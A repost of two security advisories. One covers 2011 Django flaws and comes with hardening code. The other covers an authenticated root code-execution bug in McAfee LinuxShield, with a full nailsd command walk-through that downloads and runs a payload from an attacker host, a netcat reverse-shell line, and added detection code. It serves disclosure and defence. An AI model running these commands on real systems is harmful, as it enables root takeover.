Multiple security vulnerabilities in the Django development framework
Published: 2011-09-12

Affected versions:
Django 1.2.5
Django 1.3 beta 1
Django 1.2.4
Django 1.2.2
Django 1.2

Vulnerability description:

Django is an open-source web application framework written in Python.
Django contains multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache poisoning attacks, or cause a denial of service.
1) When a cache backend is used, session handling in django.contrib.sessions contains an error that can be exploited to manipulate session data. Successful exploitation requires that the session key is known and that the application lets the attacker store a dictionary-like object in the cache under a valid session key.
2) Django's model system includes a field type, URLField, that validates whether a supplied value is a legitimate URL; if the boolean keyword argument verify_exists is true, it also attempts to fetch and parse the supplied URL. By default the underlying socket has no timeout, so an attacker can supply a specially crafted URL that consumes all of the server's memory, causing a denial of service.
3) The handling of redirect responses while validating URLs supplied to a URLField contains an error. An attacker can exploit it by returning a redirect to a "file://" URL and thereby determine whether a given local file exists on the server.
4) The handling of the "X-Forwarded-Host" HTTP header when generating the full-path URL of a redirect response contains an error that an attacker can exploit for cache poisoning attacks.

Details:
https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
http://secunia.com/advisories/45939/

Notice: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.
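A worked illustration of items 2 to 4 of the post above, added here as an example; it is not Django's own code. It puts the pre-fix redirect builder, which trusts any X-Forwarded-Host a client sends, beside a hardened version that honours the header only on explicit opt-in (the shape of the USE_X_FORWARDED_HOST switch Django introduced in the fix) and checks the resulting host against an allow-list (the later ALLOWED_HOSTS-style hardening, shown here as the complete pattern). It also shows the scheme check a URL validator needs before following a redirect, and a verification fetch with a timeout and a read cap. ALLOWED_HOSTS, SAMPLE_HEADERS and every function name are assumptions made for this example.

```python
"""Added example for items 2 to 4 of the advisory above; not Django's code.
ALLOWED_HOSTS, SAMPLE_HEADERS and all function names are assumptions."""
import urllib.request
from urllib.parse import urlsplit

# Assumption: the hostnames this deployment legitimately answers for.
ALLOWED_HOSTS = {"www.example.com"}

# Constructed request headers: Host is what the front-end set, X-Forwarded-Host
# was injected by the client (any client can send it).
SAMPLE_HEADERS = {"Host": "www.example.com", "X-Forwarded-Host": "evil.example.net"}


def vulnerable_redirect(headers, location):
    """Pre-fix behaviour (item 4): X-Forwarded-Host wins whenever present, so
    the absolute Location carries the attacker's host.  A shared cache in
    front of the application stores that response and replays it to others."""
    host = headers.get("X-Forwarded-Host", headers["Host"])
    return f"http://{host}{location}"


def host_from_request(headers, use_x_forwarded_host=False):
    """Only honour X-Forwarded-Host when the deployment opts in because a
    trusted proxy is known to set it; otherwise use Host."""
    if use_x_forwarded_host and "X-Forwarded-Host" in headers:
        return headers["X-Forwarded-Host"]
    return headers["Host"]


def host_is_allowed(host, allowed_hosts):
    """Case-insensitive allow-list check on the hostname part (port stripped;
    IPv6 literals are not handled in this example)."""
    return host.split(":", 1)[0].lower() in allowed_hosts


def build_redirect(headers, location, allowed_hosts, use_x_forwarded_host=False):
    """Hardened absolute-URL builder: the host must be one we answer for."""
    host = host_from_request(headers, use_x_forwarded_host)
    if not host_is_allowed(host, allowed_hosts):
        raise ValueError(f"untrusted host {host!r}")
    return f"http://{host}{location}"


def fetch_target_is_allowed(url):
    """Scheme allow-list for URLs a validator is about to fetch (item 3):
    a redirect to file:///etc/passwd is refused before any I/O happens."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def bounded_fetch(url, timeout=5.0, max_bytes=64 * 1024):
    """Verification fetch with a socket timeout and a read cap (item 2), so a
    slow or endless response cannot hold the worker or exhaust memory.
    Not exercised offline."""
    if not fetch_target_is_allowed(url):
        raise ValueError(f"refusing to fetch {url!r}")
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        if not fetch_target_is_allowed(resp.url):  # final URL after redirects
            raise ValueError(f"redirected to {resp.url!r}")
        return resp.read(max_bytes)


def demo():
    """Outcomes for SAMPLE_HEADERS; a rejected case is reported as text."""
    try:
        opt_in = build_redirect(SAMPLE_HEADERS, "/login/", ALLOWED_HOSTS,
                                use_x_forwarded_host=True)
    except ValueError as exc:
        opt_in = f"rejected: {exc}"
    return {
        "vulnerable": vulnerable_redirect(SAMPLE_HEADERS, "/login/"),
        "hardened_default": build_redirect(SAMPLE_HEADERS, "/login/", ALLOWED_HOSTS),
        "hardened_opt_in": opt_in,
        "file_target_allowed": fetch_target_is_allowed("file:///etc/passwd"),
        "https_target_allowed": fetch_target_is_allowed("https://www.example.com/ok"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running the block prints each case. The vulnerable variant is what turns a header any client can send into a stored response: the Location a front cache keeps points at the attacker's host. With opt-in enabled but no trusted proxy rewriting the header, the allow-list is what still stops the poisoned URL from being built.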

 


McAfee LinuxShield local/remote code execution vulnerability
Affected versions: McAfee LinuxShield <= 1.5.1
Remote: Yes
Local: Yes
Background:
===========

LinuxShield detects and removes viruses and other potentially unwanted
software on Linux-based systems. LinuxShield uses the powerful McAfee
scanning engine, the engine common to all our anti-virus products.

Although a few years ago, the Linux operating system was considered a
secure environment, it is now seeing more occurrences of software
specifically written to attack or exploit security weaknesses in
Linux-based systems. Increasingly, Linux-based systems interact with
Windows-based computers. Although viruses written to attack
Windows-based systems do not directly attack Linux systems, a Linux
server can harbor these viruses, ready to infect any client that
connects to it.

When installed on your Linux systems, LinuxShield provides protection
against viruses, Trojan horses, and other types of potentially
unwanted software.

LinuxShield scans files as they are opened and closed, a technique
known as on-access scanning. LinuxShield also incorporates an
on-demand scanner that enables you to scan any directory or file in
your host at any time.

When kept up-to-date with the latest virus-definition (DAT) files,
LinuxShield is an important part of your network security. We
recommend that you set up an anti-virus security policy for your
network, incorporating as many protective measures as possible.

LinuxShield uses a web-browser interface, and a large number of
LinuxShield installations can be centrally controlled by ePolicy
Orchestrator.

(Product description from LinuxShield Product Guide)


Description:
============

This vulnerability allows remote attackers to execute arbitrary code
on vulnerable installations of McAfee LinuxShield. User interaction
is not required to exploit this vulnerability but an attacker must
be authenticated.

The LinuxShield web interface communicates with the locally installed
"nailsd" daemon, which listens on port 65443/tcp, to make configuration
changes, query the configuration and execute tasks.

Each user who can log in to the victim box can also authenticate
to the "nailsd" daemon and can make configuration changes and execute
tasks with root privileges.

A direct execution of commands is not possible, but it is possible to
download and execute code through manipulation of the config and
execution of scheduled tasks of the LinuxShield.


Walk-through (after the TLS handshake):
+--------------------------------------
(Long commands are single lines; they are wrapped and indented here
for readability.)

nailsd > +OK welcome to the NAILS Statistics Service
attacker> auth <user> <pass>
nailsd > +OK successful authentication

# Set the attacker repository to download our code from a httpd
# (catalog.z)
#---------------------------------------------------------------
attacker> db set 1 _table=repository status=1
    siteList=<?xml version="1.0" encoding="UTF-8"?><ns:SiteLists
    xmlns:ns="naSiteList" GlobalVersion="20030131003110"
    LocalVersion="20091209161903" Type="Client"><SiteList Default="1"
    Name="SomeGUID"><HttpSite Type="repository" Name="EvilRepo" Order="1"
    Server="<attackerhost>:80" Enabled="1"
    Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password
    Encrypted="0"/></HttpSite></SiteList></ns:SiteLists>
    _cmd=update
nailsd > +OK database changes buffered.

# Execute task to set the attacker repository
#---------------------------------------------------------------
attacker> task setsitelist
nailsd > +OK setting sitelist from CMA.

# Execute the default Update task to download the code
#---------------------------------------------------------------
attacker> task nstart LinuxShield Update
nailsd > +OK task LinuxShield Update starting

# Create a scan profile, which executes our code. The profiles are
# not stored in the database.
# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
#---------------------------------------------------------------
attacker> sconf ODS_99 begin
nailsd > +OK 1260400888

# Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
# where our earlier downloaded catalog.z file is stored.
# (/opt/McAfee/cma/scratch/update/catalog.z)
#---------------------------------------------------------------
attacker> sconf ODS_99 set 1260400888
    nailsd.profile.ODS_99.allFiles=true
    nailsd.profile.ODS_99.childInitTmo=60
    nailsd.profile.ODS_99.cleanChildren=2
    nailsd.profile.ODS_99.cleansPerChild=10000
    nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat
    nailsd.profile.ODS_99.decompArchive=true
    nailsd.profile.ODS_99.decompExe=true
    nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib
    nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
    nailsd.profile.ODS_99.factoryInitTmo=60
    nailsd.profile.ODS_99.heuristicAnalysis=true
    nailsd.profile.ODS_99.macroAnalysis=true
    nailsd.profile.ODS_99.maxQueSize=32
    nailsd.profile.ODS_99.mime=true
    nailsd.profile.ODS_99.noJokes=false
    nailsd.profile.ODS_99.program=true
    nailsd.profile.ODS_99.quarantineChildren=1
    nailsd.profile.ODS_99.quarantineDirectory=/quarantine
    nailsd.profile.ODS_99.quarantinesPerChild=10000
    nailsd.profile.ODS_99.scanChildren=2
    nailsd.profile.ODS_99.scanMaxTmo=301
    nailsd.profile.ODS_99.scanNWFiles=true
    nailsd.profile.ODS_99.scanOnRead=true
    nailsd.profile.ODS_99.scanOnWrite=true
    nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z
    nailsd.profile.ODS_99.scansPerChild=10000
    nailsd.profile.ODS_99.slowScanChildren=0
    nailsd.profile.ODS_99.filter.0.type=exclude-path
    nailsd.profile.ODS_99.filter.0.path=/proc
    nailsd.profile.ODS_99.filter.0.subdir=true
    nailsd.profile.ODS_99.filter.extensions.mode=all
    nailsd.profile.ODS_99.filter.extensions.type=extension
    nailsd.profile.ODS_99.action.Default.primary=Clean
    nailsd.profile.ODS_99.action.Default.secondary=Quarantine
    nailsd.profile.ODS_99.action.App.primary=Clean
    nailsd.profile.ODS_99.action.App.secondary=Quarantine
    nailsd.profile.ODS_99.action.timeout=Pass
    nailsd.profile.ODS_99.action.error=Block
nailsd > +OK configuration changes buffered
attacker> sconf ODS_99 commit 1260400888
nailsd > +OK configuration changes stored

# Set a scan task with the manipulated profile to execute the code
#---------------------------------------------------------------
attacker> db set 1260400888 _table=schedule taskName=Evil Task
    taskType=On-Demand
    taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false
    timetable=type=unscheduled taskResults= _lastRun=1260318482
    status=Stopped _cmd=insert
nailsd > +OK database changes buffered

# Execute scan task to execute the code
#---------------------------------------------------------------
attacker> task nstart Evil Task

+-------------------------------------- walk-through EOF

To get a reverse root shell place something like this in the catalog.z

--- snip ---
#!/bin/sh
nc -nv <attacker_host> 4444 -e /bin/sh
--- /snip ---


Proof of Concept:
=================

http://inj3ct0r.com/sploits/11165.tar.gz
Solution:
=========

McAfee Advisory
+--------------
https://kc.mcafee.com/corporate/index?page=content&id=SB10007


Disclosure Timeline (YYYY/MM/DD):
=================================

2009.12.07: Vulnerability found
2010.02.03: Asked vendor for a PGP key
2010.02.05: Vendor sent his PGP key
2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
            date (2010.02.18) to Vendor
2010.02.05: Vendor acknowledges the reception of the advisory
2010.02.16: Asked for a status update, because the planned release date is
            2010.02.18.
2010.02.16: Vendor responds that they are currently working on a patch
2010.02.17: Changed release date to 2010.02.25.
2010.02.22: Vendor gives a status update that they are able to release
            the patch on 2010.02.25.
2010.02.24: Asked for a list of affected products and the advisory URL.
2010.02.24: Vendor sends the list.
2010.03.02: Release of this Advisory
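For the defensive side of the walk-through above, here is an added example; it is neither McAfee's code nor the advisory author's. It audits the two settings the attacker has to change: it parses an `sconf <profile> set <ticket> k=v ...` line in the form the walk-through shows and flags scannerPath or enginePath values that lie outside the engine tree (plus keys that address a different profile than the one being committed, as the ODS_5 key inside the ODS_99 block does), and it walks a SiteList XML of the shape passed in the `db set` command and flags repository servers that are not in a trusted list. The engine root, the trusted-server set and both sample inputs are assumptions or constructed data; the sample sconf line is a shortened copy of the one in the walk-through.

```python
"""Added example (not McAfee's code, not the advisory author's): audit the two
settings the walk-through above changes.  The engine root, the trusted-server
set and the sample inputs are assumptions / constructed data."""
import re
import xml.etree.ElementTree as ET

ENGINE_ROOT = "/opt/NAI/LinuxShield/engine/"      # assumption: legitimate engine tree
EXECUTABLE_KEYS = ("scannerPath", "enginePath")   # values the scanner loads and runs
PROFILE_KEY = re.compile(r"^nailsd\.profile\.(?P<profile>[^.]+)\.(?P<setting>.+)$")
TRUSTED_SERVERS = {"update.example-vendor.test"}  # assumption: your own update hosts

# Constructed input: a shortened copy of the walk-through's sconf line.
SAMPLE_SCONF = (
    "sconf ODS_99 set 1260400888 "
    "nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so "
    "nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat "
    "nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z"
)

# Constructed site list in the shape of the walk-through's siteList value:
# the attacker's entry (RFC 5737 test address) plus a placeholder vendor entry.
SAMPLE_SITELIST = """
<ns:SiteLists xmlns:ns="naSiteList" Type="Client">
  <SiteList Default="1" Name="SomeGUID">
    <HttpSite Type="repository" Name="EvilRepo" Order="1" Server="203.0.113.5:80"
              Enabled="1" Local="1">
      <RelativePath>nai</RelativePath><UseAuth>0</UseAuth>
      <UserName></UserName><Password Encrypted="0"/>
    </HttpSite>
    <HttpSite Type="repository" Name="VendorRepo" Order="2"
              Server="update.example-vendor.test:80" Enabled="1" Local="0">
      <RelativePath>nai</RelativePath><UseAuth>0</UseAuth>
    </HttpSite>
  </SiteList>
</ns:SiteLists>
"""


def parse_sconf_set(line):
    """Split 'sconf <profile> set <ticket> k=v k=v ...' into (profile, {k: v}).
    Assumption: values contain no spaces, as in the walk-through."""
    tokens = line.split()
    if len(tokens) < 4 or tokens[0] != "sconf" or tokens[2] != "set":
        raise ValueError("expected 'sconf <profile> set <ticket> k=v ...'")
    settings = {}
    for token in tokens[4:]:
        key, sep, value = token.partition("=")
        if not sep:
            raise ValueError(f"malformed token {token!r}")
        settings[key] = value
    return tokens[1], settings


def audit_profile(profile, settings, engine_root=ENGINE_ROOT):
    """Findings as (kind, key, value): loadable paths outside the engine tree,
    and keys that address a profile other than the one being committed."""
    findings = []
    for key, value in settings.items():
        m = PROFILE_KEY.match(key)
        if m is None:
            findings.append(("unexpected-key", key, value))
            continue
        if m["profile"] != profile:
            findings.append(("stray-profile-key", key, value))
        if m["setting"] in EXECUTABLE_KEYS and not value.startswith(engine_root):
            findings.append(("untrusted-path", key, value))
    return findings


def audit_sitelist(xml_text, trusted_servers):
    """(site name, server) for every enabled HttpSite whose host is not trusted.
    The child elements carry no namespace, so iter('HttpSite') finds them.
    This is local configuration; for XML from an untrusted source prefer defusedxml."""
    root = ET.fromstring(xml_text.strip())
    bad = []
    for site in root.iter("HttpSite"):
        if site.get("Enabled", "1") != "1":
            continue
        server = site.get("Server", "")
        host = server.rsplit(":", 1)[0].lower()  # strip port; no IPv6 literals assumed
        if host not in trusted_servers:
            bad.append((site.get("Name"), server))
    return bad


def run_audit(sconf_line=SAMPLE_SCONF, sitelist_xml=SAMPLE_SITELIST,
              trusted=TRUSTED_SERVERS):
    profile, settings = parse_sconf_set(sconf_line)
    return {"profile": audit_profile(profile, settings),
            "sitelist": audit_sitelist(sitelist_xml, trusted)}


if __name__ == "__main__":
    for section, findings in run_audit().items():
        for finding in findings:
            print(section, *finding)
```

On a suspected host the same checks can be run against the profile store the walk-through names (/var/opt/NAI/LinuxShield/etc/ods.cfg, assuming it holds the same key=value pairs that sconf accepts) and against the sitelist kept in the repository table; a scannerPath under /opt/McAfee/cma/scratch/update/ is exactly the pivot the advisory describes, and an enabled repository entry pointing anywhere but your vendor's update host is the download stage.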

